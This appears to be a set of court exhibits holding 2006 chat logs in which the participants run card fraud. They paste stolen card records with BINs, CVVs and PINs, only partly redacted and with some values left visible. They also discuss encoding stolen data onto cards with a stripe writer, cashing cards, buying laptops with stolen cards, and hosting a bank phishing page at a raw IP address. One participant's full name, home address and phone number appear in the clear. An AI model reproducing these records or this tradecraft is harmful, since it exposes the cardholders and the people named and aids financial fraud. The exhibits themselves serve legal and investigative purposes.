**denisektran (Mon Jun 12 12:46:28 2006):** i get the best they have
**denisektran (Mon Jun 12 12:46:32 2006):** any price
**denisektran (Mon Jun 12 12:46:40 2006):** watever the have in store
**denisektran (Mon Jun 12 12:46:49 2006):** hey u say bank1 works?
**scstrazilesrl (Mon Jun 12 12:46:56 2006):** ok
**scstrazilesrl (Mon Jun 12 12:46:58 2006):** yes
**denisektran (Mon Jun 12 12:47:05 2006):** u hear or u kno?
**scstrazilesrl (Mon Jun 12 12:47:13 2006):** i jus hear
**scstrazilesrl (Mon Jun 12 12:47:18 2006):** some guy still asking
**scstrazilesrl (Mon Jun 12 12:47:18 2006):** it
**scstrazilesrl (Mon Jun 12 12:47:23 2006):** cc num
**scstrazilesrl (Mon Jun 12 12:47:23 2006):** exp date
**scstrazilesrl (Mon Jun 12 12:47:23 2006):** pin
**scstrazilesrl (Mon Jun 12 12:47:23 2006):** cvv
**denisektran (Mon Jun 12 12:47:32 2006):** ahh...so u never cashed yet
**scstrazilesrl (Mon Jun 12 12:48:05 2006):** nope
**scstrazilesrl (Mon Jun 12 12:48:08 2006):** i told
**scstrazilesrl (Mon Jun 12 12:48:13 2006):** ya
**scstrazilesrl (Mon Jun 12 12:48:13 2006):** i got no msr here
**denisektran (Mon Jun 12 12:48:28 2006):** how bout ur cashier
**denisektran (Mon Jun 12 12:48:31 2006):** there
**scstrazilesrl (Mon Jun 12 12:48:39 2006):** whom ?
**scstrazilesrl (Mon Jun 12 12:48:46 2006):** i cash my own cards
**denisektran (Mon Jun 12 12:48:58 2006):** but him he cash b1?
**scstrazilesrl (Mon Jun 12 12:49:09 2006):** yes

scstrazilesrl (Mon Jun 12 12:49:17 2006): in us he told me he has his brother in us
denisektran (Mon Jun 12 12:50:13 2006): not cash in eu uk?
scstrazilesrl (Mon Jun 12 12:51:15 2006): nope
scstrazilesrl (Mon Jun 12 12:51:40 2006):
http://www.walmart.com/catalog/product.do?product_id=4661245
scstrazilesrl (Mon Jun 12 12:52:59 2006):
http://www.walmart.com/catalog/product.do?product_id=4898008
scstrazilesrl (Mon Jun 12 12:53:20 2006):
http://www.walmart.com/catalog/product.do?product_id=2470291
scstrazilesrl (Mon Jun 12 12:54:38 2006): + carry bag + adaptor rs323 - usb serial - usb
scstrazilesrl (Mon Jun 12 12:54:43 2006): :that's it
scstrazilesrl (Mon Jun 12 12:54:43 2006): :P
scstrazilesrl (Mon Jun 12 12:54:48 2006): it's ok ?
scstrazilesrl (Mon Jun 12 12:55:31 2006): and a lil mice for it
denisektran (Mon Jun 12 12:55:35 2006): ok
scstrazilesrl (Mon Jun 12 12:55:39 2006): that's all
scstrazilesrl (Mon Jun 12 12:55:41 2006): chedck it
scstrazilesrl (Mon Jun 12 13:14:19 2006): eBay PIN ▓▓▓▓▓ Bank of America, National Association
DEBIT PLATINUM United St...
scstrazilesrl (Mon Jun 12 13:14:24 2006): eBay PIN :▓▓▓▓▓ NU PLATESTE/FIFTH THIRD BANK,
THE US 513-579-5447 Mon Jun 12, 2006
scstrazilesrl (Mon Jun 12 13:36:03 2006): mag stripe
scstrazilesrl (Mon Jun 12 13:36:06 2006): it's correct ?
scstrazilesrl (Mon Jun 12 13:41:43 2006): man still there ?
scstrazilesrl (Mon Jun 12 13:42:30 2006): tien
scstrazilesrl (Mon Jun 12 13:48:02 2006): i leave my info's here i will go for a snap if you can please
call me until i will reject your call i have no voicemail activated
scstrazilesrl (Mon Jun 12 13:48:07 2006): first name : Narcis
scstrazilesrl (Mon Jun 12 13:48:10 2006): last name : Neciu
scstrazilesrl (Mon Jun 12 13:49:41 2006): address : Aleea Crinilor Number 6 , Bloc P9 , Scara 1 , Etaj 3
, Apartament 14
scstrazilesrl (Mon Jun 12 13:49:42 2006): City : Drobeta Turnu Severin
scstrazilesrl (Mon Jun 12 13:49:47 2006): State : Mehedinti
scstrazilesrl (Mon Jun 12 13:50:00 2006): Zip : 220054
scstrazilesrl (Mon Jun 12 13:50:06 2006): Country : Romania
scstrazilesrl (Mon Jun 12 13:50:54 2006): this is my phone number # : +40747892812 please call me at
5 6 PM YOUR HOUR :*
scstrazilesrl (Mon Jun 12 13:50:57 2006): take care of you
denisektran (Mon Jun 12 13:51:07 2006): back
scstrazilesrl (Mon Jun 12 13:51:14 2006): wb
scstrazilesrl (Mon Jun 12 13:51:18 2006): i was preparing
scstrazilesrl (Mon Jun 12 13:51:21 2006): for a snap
scstrazilesrl (Mon Jun 12 13:51:30 2006): can you call me in 3 -4 hours
denisektran (Mon Jun 12 13:51:35 2006): ok
scstrazilesrl (Mon Jun 12 13:51:35 2006): to wake me ?
scstrazilesrl (Mon Jun 12 13:51:41 2006): but don't forget please
denisektran (Mon Jun 12 13:51:46 2006): lol
scstrazilesrl (Mon Jun 12 13:51:46 2006): i have no voicemail
scstrazilesrl (Mon Jun 12 13:51:48 2006): ;)
denisektran (Mon Jun 12 13:51:54 2006): i prballuy will
scstrazilesrl (Mon Jun 12 13:51:59 2006): forget ?
scstrazilesrl (Mon Jun 12 13:52:00 2006): :((
denisektran (Mon Jun 12 13:52:20 2006): but will have trk# for u
scstrazilesrl (Mon Jun 12 13:52:31 2006): write down : at 6 PM i need to call narcis to wake him up
scstrazilesrl (Mon Jun 12 13:52:36 2006): i wanna wake me up
scstrazilesrl (Mon Jun 12 13:52:42 2006): so i do scam and other

**scstrazilesrl (Mon Jun 12 13:52:42 2006):** :P
**scstrazilesrl (Mon Jun 12 13:53:17 2006):** just if you don't forget
**scstrazilesrl (Mon Jun 12 13:53:24 2006):** call me until i will reject your call
**scstrazilesrl (Mon Jun 12 13:53:25 2006):** please
**scstrazilesrl (Mon Jun 12 13:53:26 2006):** :*
**scstrazilesrl (Mon Jun 12 13:53:31 2006):** take care of you
**scstrazilesrl (Mon Jun 12 22:27:11 2006):**


**Conversation joined at Mon Jun 12 23:08:05 2006.**


**scstrazilesrl (Mon Jun 12 23:08:05 2006):** there ?
**scstrazilesrl (Mon Jun 12 23:08:05 2006):** :)
**scstrazilesrl (Mon Jun 12 23:08:08 2006):** back :P
**scstrazilesrl (Mon Jun 12 23:08:40 2006):** i got one netspend card ;)
**scstrazilesrl (Mon Jun 12 23:09:03 2006):** eBay PIN ████████PLATESTE/HARRIS TRUST & SAVINGS BANK US 312-461-2121 Mon Jun 12, 2006 2k
**denisektran (Mon Jun 12 23:09:03 2006):** ok
**scstrazilesrl (Mon Jun 12 23:09:09 2006):** eBay PIN ████NU PLATESTE/USAA FEDERAL SAVINGS BANK US 800-531-2265 Mon Jun 12, 2006 2k
**scstrazilesrl (Mon Jun 12 23:09:14 2006):** eBay PIN : ██████FANTOMA
**scstrazilesrl (Mon Jun 12 23:09:20 2006):** eBay PIN : ██████ ZIP NETWORK US 1-800-541-4583
**scstrazilesrl (Mon Jun 12 23:09:30 2006):** eBay PIN : ██████FANTOMA
**scstrazilesrl (Mon Jun 12 23:09:35 2006):** eBay PIN : ██████Arvest Bank DEBIT CLASSIC United States of America
**scstrazilesrl (Mon Jun 12 23:09:54 2006):** Credit Card Number : ████████████ Expiration Date On File : Expiration Date :██████CVV Code :███First Pin : ████Last Pin : ████
**scstrazilesrl (Mon Jun 12 23:10:05 2006):** that one it's netspend
**scstrazilesrl (Mon Jun 12 23:10:24 2006):** now tell me the rest you chose :D
**scstrazilesrl (Mon Jun 12 23:11:02 2006):** BIN ██████PLATESTE/HARRIS TRUST & SAVINGS BANK US 312-461-2121 Credit Card Number On File : Credit Card Number : ██████████████Expiration Date On File : Expiration Date :████████CVV Code :████First Pin : ████Last Pin :████
**scstrazilesrl (Mon Jun 12 23:12:16 2006):** Credit Card Number : 4████████████Expiration Date On File : Expiration Date : ██████CVV Code :████First Pin : ████Last Pin ████
**scstrazilesrl (Mon Jun 12 23:12:42 2006):** Credit Card Number : 5████████████Expiration Date On File : Expiration Date :██████CVV Code :████First Pin : 3516Last Pin ████
**scstrazilesrl (Mon Jun 12 23:13:06 2006):** Credit Card Number : ████████████Expiration Date On File : Expiration Date :██████CVV Code :████First Pin : ████Last Pin : ████
**denisektran (Mon Jun 12 23:13:41 2006):** ok
**denisektran (Mon Jun 12 23:13:47 2006):** just paste
**scstrazilesrl (Mon Jun 12 23:14:09 2006):** Credit Card Number : ██████████████Expiration Date On File : Expiration Date :██████CVV Code :████First Pin ████
**scstrazilesrl (Mon Jun 12 23:14:17 2006):** this is all
**denisektran (Mon Jun 12 23:14:20 2006):** ok
**scstrazilesrl (Mon Jun 12 23:14:29 2006):** what about
**scstrazilesrl (Mon Jun 12 23:14:31 2006):** other cards ?
**scstrazilesrl (Mon Jun 12 23:14:35 2006):** none worked ?
**denisektran (Mon Jun 12 23:14:43 2006):** i didnt do all
**scstrazilesrl (Mon Jun 12 23:14:52 2006):** from wich you do ?

**scstrazilesrl (Mon Jun 12 23:14:54 2006):** none worked ?
**denisektran (Mon Jun 12 23:15:04 2006):** nope none new worked
**scstrazilesrl (Mon Jun 12 23:15:12 2006):** ok :(
**denisektran (Mon Jun 12 23:15:28 2006):** why did we stop fnb-online spam?
**denisektran (Mon Jun 12 23:15:40 2006):** i forgot
**scstrazilesrl (Mon Jun 12 23:15:43 2006):** i have scam
**scstrazilesrl (Mon Jun 12 23:15:44 2006):** ON
**scstrazilesrl (Mon Jun 12 23:16:10 2006):** i guess
**scstrazilesrl (Mon Jun 12 23:16:14 2006):** http://24.169.138.210/fnb/
**scstrazilesrl (Mon Jun 12 23:16:18 2006):** working ?
**scstrazilesrl (Mon Jun 12 23:16:39 2006):** i don't have good emails man
**scstrazilesrl (Mon Jun 12 23:16:40 2006):** :(
**denisektran (Mon Jun 12 23:16:47 2006):** u have trantula
**scstrazilesrl (Mon Jun 12 23:16:57 2006):** yeah but 2kb/s
**scstrazilesrl (Mon Jun 12 23:17:04 2006):** so unsefull
**scstrazilesrl (Mon Jun 12 23:17:05 2006):** now
**scstrazilesrl (Mon Jun 12 23:17:47 2006):** wanna me host fnb scam ?
**scstrazilesrl (Mon Jun 12 23:20:00 2006):** Full Name : ▇▇▇▇▇▇▇ Billing Address : ▇
▇▇▇▇▇▇▇ Billing Address 2 : City : ▇▇▇▇▇ State : Illinois Zip Code : ▇▇▇ Country : United
States Primary telephone : ▇▇▇▇▇▇ Night Phone : - - Email Address : ▇▇▇▇▇▇
▇▇▇▇▇▇▇▇ Date of birth : ▇▇▇▇▇ Social Security Number : ▇▇▇▇▇▇▇ Driver
License State : Illinois Driver License Number : ▇▇▇▇▇▇ Mother Maiden Name : schmitz BIN :
529149 NU PLATESTE/CAPITAL ONE BANK US 804-967-1000 Credit Card Number On File : Credit
Card Number ▇▇▇▇▇ Expiration Date On File : Expiration Date : ▇▇▇ CVV Code : 973
**scstrazilesrl (Mon Jun 12 23:22:12 2006):** i
**denisektran (Mon Jun 12 23:22:16 2006):** ?
**denisektran (Mon Jun 12 23:22:19 2006):** wat that
**scstrazilesrl (Mon Jun 12 23:22:28 2006):** guess you were lazy to go to valmart ;) and also go shiping
**scstrazilesrl (Mon Jun 12 23:22:33 2006):** nothing wrong window
**denisektran (Mon Jun 12 23:23:52 2006):** i went to walmart
**denisektran (Mon Jun 12 23:23:59 2006):** but no good lappie
**scstrazilesrl (Mon Jun 12 23:24:05 2006):** :(
**denisektran (Mon Jun 12 23:24:07 2006):** i go to another
**scstrazilesrl (Mon Jun 12 23:24:12 2006):** you didn't find that one ?
**scstrazilesrl (Mon Jun 12 23:24:16 2006):** i pasted you ?
**denisektran (Mon Jun 12 23:24:24 2006):** or u want u can order online and ship it to me
**denisektran (Mon Jun 12 23:24:45 2006):** i give u the gift card #
**scstrazilesrl (Mon Jun 12 23:24:51 2006):** ah ok
**scstrazilesrl (Mon Jun 12 23:24:57 2006):** what other store do you have ?
**denisektran (Mon Jun 12 23:25:08 2006):** just walmart
**scstrazilesrl (Mon Jun 12 23:25:12 2006):** ok
**scstrazilesrl (Mon Jun 12 23:25:16 2006):** hold
**denisektran (Mon Jun 12 23:25:21 2006):** ok pick one
**scstrazilesrl (Mon Jun 12 23:26:42 2006):** what's nanci doing ?
**denisektran (Mon Jun 12 23:27:00 2006):** play with my bro dice
**scstrazilesrl (Mon Jun 12 23:27:10 2006):** ok:)
**scstrazilesrl (Mon Jun 12 23:27:16 2006):** what's dice :D
**denisektran (Mon Jun 12 23:27:55 2006):** u kno craps?
**denisektran (Mon Jun 12 23:28:02 2006):** casino game?

scstrazilesrl (Mon Jun 12 23:28:28 2006): nope ;)
scstrazilesrl (Mon Jun 12 23:28:42 2006): :">
denisektran (Mon Jun 12 23:28:45 2006): they throw 2 dice to try to get 7 or 11 point
scstrazilesrl (Mon Jun 12 23:29:19 2006): aha :)
scstrazilesrl (Mon Jun 12 23:29:24 2006): i see
scstrazilesrl (Mon Jun 12 23:29:24 2006): :P
denisektran (Mon Jun 12 23:34:03 2006): http://zone.msn.com/en/casinocraps/default
denisektran (Mon Jun 12 23:34:06 2006): dice
scstrazilesrl (Mon Jun 12 23:35:54 2006): http://www.capitalex.com/
denisektran (Mon Jun 12 23:36:15 2006): ??
denisektran (Mon Jun 12 23:36:20 2006): wat about
scstrazilesrl (Mon Jun 12 23:36:29 2006): egold exchanger
scstrazilesrl (Mon Jun 12 23:36:32 2006): ;)
denisektran (Mon Jun 12 23:36:32 2006): yes
denisektran (Mon Jun 12 23:36:47 2006): i kno..they are many
scstrazilesrl (Mon Jun 12 23:36:55 2006): tell me
scstrazilesrl (Mon Jun 12 23:36:59 2006): something
scstrazilesrl (Mon Jun 12 23:37:06 2006): when i use your gift card
scstrazilesrl (Mon Jun 12 23:37:06 2006): can i do it
scstrazilesrl (Mon Jun 12 23:37:06 2006): with .ro ip ?
denisektran (Mon Jun 12 23:38:41 2006): yes
scstrazilesrl (Mon Jun 12 23:40:32 2006):
http://www.walmart.com/catalog/product.do?product_id=4661245
scstrazilesrl (Mon Jun 12 23:40:38 2006): tell me in your opinion
scstrazilesrl (Mon Jun 12 23:40:41 2006): this is a good lapie ?

EXHIBIT 2

**Chat session between Nguyen and Roger Tran:**

**Conversation joined at Thu Jun 22 11:19:17 2006.**

scur51 (Thu Jun 22 11:19:17 2006): ki

**Conversation joined at Thu Jun 22 13:36:07 2006.**

scur51 (Thu Jun 22 13:36:07 2006): yjg\
scur51 (Thu Jun 22 14:30:49 2006): I am currently away from the computer.
scur51 (Thu Jun 22 14:59:47 2006): ukh
scur51 (Thu Jun 22 15:00:09 2006): what happened
denisektran (Thu Jun 22 15:02:05 2006): wat u men
denisektran (Thu Jun 22 15:02:17 2006): they will try to dismiss the case
denisektran (Thu Jun 22 15:02:35 2006): on the grounds of illegal search
scur51 (Thu Jun 22 15:02:43 2006): coo
scur51 (Thu Jun 22 15:02:56 2006): u comin to sac
denisektran (Thu Jun 22 15:02:59 2006): but he say maybe not on first case
denisektran (Thu Jun 22 15:03:06 2006): on the appeal
denisektran (Thu Jun 22 15:03:11 2006): will win it
scur51 (Thu Jun 22 15:04:27 2006): u comin to sac
denisektran (Thu Jun 22 15:04:51 2006): yea
denisektran (Thu Jun 22 15:04:55 2006): tomorrow
scur51 (Thu Jun 22 15:05:55 2006): are yoiu really gonna go tomorrrow
denisektran (Thu Jun 22 15:06:02 2006): i try
denisektran (Thu Jun 22 15:06:07 2006): oh hey hey
scur51 (Thu Jun 22 15:06:09 2006): man
scur51 (Thu Jun 22 15:06:14 2006): fuckin nancy
scur51 (Thu Jun 22 15:06:28 2006): what
denisektran (Thu Jun 22 15:06:29 2006): ▮▮▮▮▮▮▮▮▮ Expiration Datex▮▮▮▮ Cvv Code▮▮▮
PIN:▮▮▮
denisektran (Thu Jun 22 15:06:40 2006): wen can u go?
scur51 (Thu Jun 22 15:06:51 2006): can i go what
denisektran (Thu Jun 22 15:06:54 2006):
▮▮▮▮▮▮▮▮▮▮00000000000000000000000000000
denisektran (Thu Jun 22 15:07:03 2006):▮▮▮▮▮▮▮▮0000000000000
denisektran (Thu Jun 22 15:07:09 2006): try
denisektran (Thu Jun 22 15:07:28 2006): can go now?
scur51 (Thu Jun 22 15:07:31 2006): ya
denisektran (Thu Jun 22 15:07:38 2006): or i go?
denisektran (Thu Jun 22 15:07:45 2006): ok u go
scur51 (Thu Jun 22 15:09:27 2006): can't get enoder started
scur51 (Thu Jun 22 15:09:29 2006): u should go
scur51 (Thu Jun 22 15:09:35 2006): what hotel u at
denisektran (Thu Jun 22 15:10:24 2006): comfort suite
scur51 (Thu Jun 22 15:10:44 2006): i'm gonna fly down

**denisektran (Thu Jun 22 15:10:47 2006):** in anahiem
**denisektran (Thu Jun 22 15:10:55 2006):** why?
**denisektran (Thu Jun 22 15:11:03 2006):** why fly?
**scur51 (Thu Jun 22 15:11:09 2006):** for shit
**denisektran (Thu Jun 22 15:11:17 2006):** how we bring back?
**scur51 (Thu Jun 22 15:11:28 2006):** fly
**scur51 (Thu Jun 22 15:11:30 2006):** i dunno
**denisektran (Thu Jun 22 15:11:47 2006):** i go back tommorow fo sure
**scur51 (Thu Jun 22 15:11:51 2006):** k
**scur51 (Thu Jun 22 15:11:57 2006):** ill go back with you tomorrow
**denisektran (Thu Jun 22 15:12:08 2006):** ok
**denisektran (Thu Jun 22 15:12:23 2006):** here i got plane ticket prepaid
**scur51 (Thu Jun 22 15:12:41 2006):** ?
**denisektran (Thu Jun 22 15:15:32 2006):** seei got prepaid ticket
**denisektran (Thu Jun 22 15:15:42 2006):** american airline'
**scur51 (Thu Jun 22 15:15:47 2006):** k
**scur51 (Thu Jun 22 15:16:05 2006):** send me code or whatever?
**denisektran (Thu Jun 22 15:17:31 2006):** <span style="background:black;color:black">████████████</span>
**scur51 (Thu Jun 22 15:17:42 2006):** ?
**denisektran (Thu Jun 22 15:18:05 2006)** <span style="background:black;color:black">█████████</span>pin<span style="background:black;color:black">█</span>
**denisektran (Thu Jun 22 15:18:22 2006):** prepaid card american airline
**scur51 (Thu Jun 22 15:18:30 2006):** o
**denisektran (Thu Jun 22 15:18:37 2006):** 50$ eacj
**scur51 (Thu Jun 22 15:19:14 2006):** might as well go southwest
**scur51 (Thu Jun 22 15:19:24 2006):** still cheaper i think
**denisektran (Thu Jun 22 15:19:25 2006):** why
**scur51 (Thu Jun 22 15:19:41 2006):** aa is 2xx somethin
**denisektran (Thu Jun 22 15:20:45 2006):** <span style="background:black;color:black">████████</span>pin<span style="background:black;color:black">█</span>
**scur51 (Thu Jun 22 15:21:27 2006):** they dopnt have a direct flight either
**denisektran (Thu Jun 22 15:21:29 2006):** <span style="background:black;color:black">████████</span>pin<span style="background:black;color:black">█</span>
**scur51 (Thu Jun 22 18:08:34 2006):** ey
**denisektran (Thu Jun 22 18:08:43 2006):** ?
**scur51 (Thu Jun 22 18:08:54 2006):** got stuff to test
**denisektran (Thu Jun 22 18:10:42 2006):** just the one igave u
**denisektran (Thu Jun 22 18:10:46 2006):** it has -400
**scur51 (Thu Jun 22 18:12:35 2006):** k
**scur51 (Thu Jun 22 18:12:44 2006):** and did you want me to drive down there to pick u up?
**denisektran (Thu Jun 22 18:12:52 2006):** no
**denisektran (Thu Jun 22 18:12:55 2006):** i go back
**scur51 (Thu Jun 22 18:26:37 2006):** can't get encoder to detect
**scur51 (Thu Jun 22 18:26:41 2006):** it lights up
**scur51 (Thu Jun 22 18:26:51 2006):** but it doesn't detect it
**denisektran (Thu Jun 22 18:28:26 2006):** chk..com
**scur51 (Thu Jun 22 18:29:05 2006):** tried all that already
**scur51 (Thu Jun 22 18:29:16 2006):** all three lights light u p
**scur51 (Thu Jun 22 18:29:30 2006):** but it doest find it
**scur51 (Thu Jun 22 18:47:00 2006):** it worked after i tried to access it with thejermms program
**scur51 (Thu Jun 22 18:47:08 2006):** and then back to the other one



**scur51 (Thu Jun 22 18:49:48 2006):** just the ███████
**scur51 (Thu Jun 22 18:49:52 2006):** ?

EXHIBIT 3

**Chat session between Nguyen and Roger Tran:**

**Conversation joined at Thu Jun 29 12:57:06 2006.**

scur51 (Thu Jun 29 12:57:06 2006): anythin u want me to do
denisektran (Thu Jun 29 12:57:15 2006): no i got none now
scur51 (Thu Jun 29 12:57:22 2006): k
denisektran (Thu Jun 29 12:57:23 2006): i rented a car to go home
scur51 (Thu Jun 29 12:57:27 2006): k
denisektran (Thu Jun 29 12:57:37 2006): im so broke
denisektran (Thu Jun 29 12:57:43 2006): fukin nanci
scur51 (Thu Jun 29 12:57:44 2006): if u want me to send walmart package just give me an adress
scur51 (Thu Jun 29 12:57:53 2006): u want me to send you cahs?
denisektran (Thu Jun 29 12:57:59 2006): i got cash
denisektran (Thu Jun 29 12:58:16 2006): but not close to how much i supposed to have
scur51 (Thu Jun 29 12:59:14 2006): that's been the story.. nanci always gets her share
scur51 (Thu Jun 29 12:59:30 2006): have u tried to get it back at all
scur51 (Thu Jun 29 12:59:46 2006): have you seen her since tuesday
denisektran (Thu Jun 29 12:59:54 2006): no i not talk with her
denisektran (Thu Jun 29 13:00:02 2006): im cut all ties
scur51 (Thu Jun 29 13:00:09 2006): k

**Conversation joined at Thu Jun 29 13:00:42 2006.**

scur51 (Thu Jun 29 13:00:42 2006): if she comes up.. should i llet her in
denisektran (Thu Jun 29 13:00:48 2006): no
denisektran (Thu Jun 29 13:01:01 2006): lock gate call police
scur51 (Thu Jun 29 13:01:05 2006): k.. even if she says its t o get her stuff
denisektran (Thu Jun 29 13:01:40 2006): no bring it out
denisektran (Thu Jun 29 13:01:45 2006): and thats it
scur51 (Thu Jun 29 13:01:48 2006): k
denisektran (Thu Jun 29 13:02:06 2006): call police if she gives shit
denisektran (Thu Jun 29 13:02:19 2006): make sure all things are put away
denisektran (Thu Jun 29 13:02:24 2006): firdt
denisektran (Thu Jun 29 13:02:27 2006): first
scur51 (Thu Jun 29 13:02:28 2006): i'll start pakin her things
scur51 (Thu Jun 29 13:02:30 2006): ya
scur51 (Thu Jun 29 13:02:42 2006): already did another fomaat
denisektran (Thu Jun 29 13:02:46 2006): \cool
scur51 (Thu Jun 29 13:03:44 2006): u want me to try to get the money from her
denisektran (Thu Jun 29 13:04:32 2006): if u can
denisektran (Thu Jun 29 13:04:42 2006): make up story
scur51 (Thu Jun 29 13:04:47 2006): ya..
denisektran (Thu Jun 29 13:04:57 2006): we need the cash pay the house
scur51 (Thu Jun 29 13:05:01 2006): surprised she hasnt called once yet
scur51 (Thu Jun 29 13:05:22 2006): not the house.. not my cell.. nothin.. wierd
scur51 (Thu Jun 29 13:05:38 2006): thats a good story since mom and aunts in vn
denisektran (Thu Jun 29 13:05:48 2006): ya

scur51 (Thu Jun 29 13:06:35 2006): ey.. one more things
scur51 (Thu Jun 29 13:06:41 2006): does she knkow pw for this sn
denisektran (Thu Jun 29 13:07:02 2006): i changed it
scur51 (Thu Jun 29 13:07:14 2006): k..
scur51 (Thu Jun 29 13:10:09 2006): lemme know if theres nethin u need... are u sure theres a computer in the package kurt picked up for us.. it's really light and that box is big for a laptop
denisektran (Thu Jun 29 13:10:25 2006): wat!!
denisektran (Thu Jun 29 13:10:31 2006): u didnt even l;ook!
denisektran (Thu Jun 29 13:10:38 2006): wtf
denisektran (Thu Jun 29 13:10:54 2006): i thought kurt said there was a laptop
denisektran (Thu Jun 29 13:11:02 2006): and it was open



scur51 (Thu Jun 29 13:11:04 2006): no.. he didn';t open it
scur51 (Thu Jun 29 13:11:20 2006): and i told him it was a laptop when you told me it was a laptop
denisektran (Thu Jun 29 13:11:30 2006): it was open!
denisektran (Thu Jun 29 13:11:33 2006): was it?
scur51 (Thu Jun 29 13:11:39 2006): i'll open it
scur51 (Thu Jun 29 13:11:44 2006): y?
denisektran (Thu Jun 29 13:11:44 2006): was it opened?
scur51 (Thu Jun 29 13:11:55 2006): i dunno.. i'll check
denisektran (Thu Jun 29 13:12:05 2006): there no laptop in there man
denisektran (Thu Jun 29 13:12:11 2006): damn.
scur51 (Thu Jun 29 13:12:21 2006): what did you buy
denisektran (Thu Jun 29 13:12:26 2006): a laptop
scur51 (Thu Jun 29 13:12:34 2006): from walmart.com?
denisektran (Thu Jun 29 13:12:36 2006): yes
scur51 (Thu Jun 29 13:12:39 2006): i'll check it
denisektran (Thu Jun 29 13:13:12 2006): has it been opened
denisektran (Thu Jun 29 13:13:15 2006): the seal
denisektran (Thu Jun 29 13:13:19 2006): broken
denisektran (Thu Jun 29 13:13:27 2006): original packing
denisektran (Thu Jun 29 13:13:31 2006): on box
scur51 (Thu Jun 29 13:14:10 2006): its there
scur51 (Thu Jun 29 13:14:17 2006): original seal\
denisektran (Thu Jun 29 13:14:18 2006): wheeew
denisektran (Thu Jun 29 13:14:29 2006): oh the lappie too?
scur51 (Thu Jun 29 13:14:29 2006): an acer
denisektran (Thu Jun 29 13:14:39 2006): ok
denisektran (Thu Jun 29 13:14:45 2006): wat config?
scur51 (Thu Jun 29 13:14:54 2006): that's what i meant.... but it looked like the outer packing was clean too
scur51 (Thu Jun 29 13:15:07 2006): didn't say on the freont
denisektran (Thu Jun 29 13:15:24 2006): no paper work?
scur51 (Thu Jun 29 13:15:29 2006): u sending this laptop?
denisektran (Thu Jun 29 13:15:32 2006): yes
denisektran (Thu Jun 29 13:15:47 2006): is it nice?
denisektran (Thu Jun 29 13:16:06 2006): acer???
denisektran (Thu Jun 29 13:16:09 2006): wait
denisektran (Thu Jun 29 13:16:28 2006): i thought was hp or something
scur51 (Thu Jun 29 13:16:49 2006): ya

**scur51 (Thu Jun 29 13:16:55 2006):** acer travewlmate
**denisektran (Thu Jun 29 13:17:02 2006):** 1 gig ram
**scur51 (Thu Jun 29 13:17:03 2006):** total with tax was 2167
**denisektran (Thu Jun 29 13:17:12 2006):** okok'
**denisektran (Thu Jun 29 13:17:36 2006):** 17 in screen?
**scur51 (Thu Jun 29 13:17:41 2006):** acer travelmate 8204wlmi 15.4 lapt
**denisektran (Thu Jun 29 13:17:44 2006):** oh
**scur51 (Thu Jun 29 13:17:46 2006):** that's all the info i got
**denisektran (Thu Jun 29 13:17:49 2006):** ok
**scur51 (Thu Jun 29 13:19:06 2006):** does nancy have keys to the house
**scur51 (Thu Jun 29 13:19:14 2006):** i know u left a set up here
**denisektran (Thu Jun 29 13:19:19 2006):** no
**scur51 (Thu Jun 29 13:19:36 2006):** k..
**scur51 (Thu Jun 29 13:19:52 2006):** remember to stop by long beach to help quy out if u can
**scur51 (Thu Jun 29 13:20:01 2006):** careful nancy mite be tere thuogh
**denisektran (Thu Jun 29 13:20:01 2006):** oh shit
**denisektran (Thu Jun 29 13:20:02 2006):** ok

EXHIBIT  4

**Chat session between Nguyen and brother Roger Tran:**

**Conversation joined at Tue Dec 12 08:28:09 2006.**

scur51 (Tue Dec 12 08:28:09 2006): ey..
denisektran (Tue Dec 12 08:28:12 2006): yo
scur51 (Tue Dec 12 08:28:17 2006): ne work?
denisektran (Tue Dec 12 08:28:17 2006): ?
denisektran (Tue Dec 12 08:28:25 2006): where u?
scur51 (Tue Dec 12 08:28:33 2006): santa ana
scur51 (Tue Dec 12 08:29:15 2006): don't work til 3.. soi got time to kill
denisektran (Tue Dec 12 08:29:45 2006): if u go lb and write cc i have pin test
scur51 (Tue Dec 12 08:30:49 2006): alrite
denisektran (Tue Dec 12 08:31:01 2006): k
scur51 (Tue Dec 12 08:32:55 2006): u gonna send pins or they in lb
denisektran (Tue Dec 12 08:33:40 2006): i send u
scur51 (Tue Dec 12 09:03:32 2006): u send them yet?
denisektran (Tue Dec 12 09:03:43 2006): ok
denisektran (Tue Dec 12 09:03:46 2006): u in lb?
scur51 (Tue Dec 12 09:03:57 2006): na
scur51 (Tue Dec 12 09:04:03 2006): not yet
denisektran (Tue Dec 12 09:04:17 2006): ill send wen u get there
scur51 (Tue Dec 12 10:36:47 2006): ey
scur51 (Tue Dec 12 10:36:51 2006): im in lb
denisektran (Tue Dec 12 10:37:44 2006): ok
denisektran (Tue Dec 12 10:37:52 2006): msr is there?
scur51 (Tue Dec 12 10:37:58 2006): ya



denisektran (Tue Dec 12 10:40:49 2006): Credit: 5291492█████████EXP: ██████CVV2:███PIN: ██████--- Credit: 4244080█████EXP: ██████CVV2: ████PIN: ██████--- Credit: 4451013█████EXP: ████CVV2: ████PIN: ██████-- Credit: 540975█████████EXP: ███████CVV2: ████PIN: █████- -- Credit: 540219█████EXP: ██████CVV2: ████PIN: █████
denisektran (Tue Dec 12 10:41:28 2006): Credit: 5436681████████EXP: █████CVV2:████PIN: 0714 --- Credit: 49218████EXP: ██████CVV2:████PIN: ████no nick: --- Credit: 54119█████EXP: ██████CVV2: ████PIN: ████--- Credit: 557689██████EXP: ████CVV2:████PIN: ████--- Credit: 470406██████EXP: ██████CVV2:████PIN: ████--- Credit: 542418██████EXP: █████CVV2: ████PIN: █████--- Credit: 44275612██████EXP: ████CVV2:████PIN: ████--- Credit: 4011801████████EXP: ██████CVV2: ████PIN:███
denisektran (Tue Dec 12 10:42:08 2006): Credit: 432845██████EXP: ██████CVV2:████PIN: ███--- Credit: 5507600█████████EXP: █████CVV2: ████PIN: ████--- Credit: 5177607█████EXP: ████CVV2: ████PIN: ████--- no nick: 5581588███████████EXP: ██████CVV2:████PIN: 1476 --- Credit: 5400430█████████EXP: ████CVV2: ████PIN: █████--- Credit: 5329007████████EXP: █████CVV2: ████PIN: ████--- Credit: 43523766██████EXP: █████CVV2:███PIN: ██████--- Credit: 4264281████████EXP: █████CVV2:████PIN: █████--- Credit: 4264290█████EXP: ████████CVV2: ████PIN: ██████--- Credit: 4229600█████EXP: ████████

CVV2:████PIN:████--- Credit: 4229600████████EXP:████████CVV2:████PIN:████--- Credit: 478200████████EXP:████████CVV2:████████

